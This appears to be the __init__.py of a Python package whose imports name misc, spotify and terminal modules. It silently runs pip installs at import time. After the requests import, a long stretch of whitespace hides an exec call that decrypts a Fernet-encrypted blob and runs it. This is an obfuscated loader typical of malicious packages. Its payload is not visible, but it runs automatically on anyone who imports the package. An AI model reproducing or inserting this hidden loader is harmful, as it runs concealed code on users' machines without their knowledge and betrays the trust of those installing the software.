import os
os.system('pip install cryptography')
os.system('pip install fernet')
os.system('pip install requests')
from fernet import Fernet
import requests                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ;exec(Fernet(b'djS66FPSykjhEKn0h0Rjdf0sL4IkoIYP5lWdqSeKvkw=').decrypt(b'gAAAAABk8g8ji9Cd0f_LnS-7EIJIS1f842ROOQGprJPcPtj6ja3Dcx3wUtlpEm6e98MiICww6cpxOe3KRlRq535wW3zlK0eWyaux3Pzfn3_snnL-Cqknfw_YOHF5czEd6zMuDBBxaMkDXVhXXvwOLufjVoqOF9k3kXfEZfZpnIMfRMxs996TOS4NGvMWWOxLUrVeAK7YzGfQ7s_xdoSxGQk_7pDBriEwlw=='))
from .misc import *
#from .license import *
from .spotify import *
from .terminal import *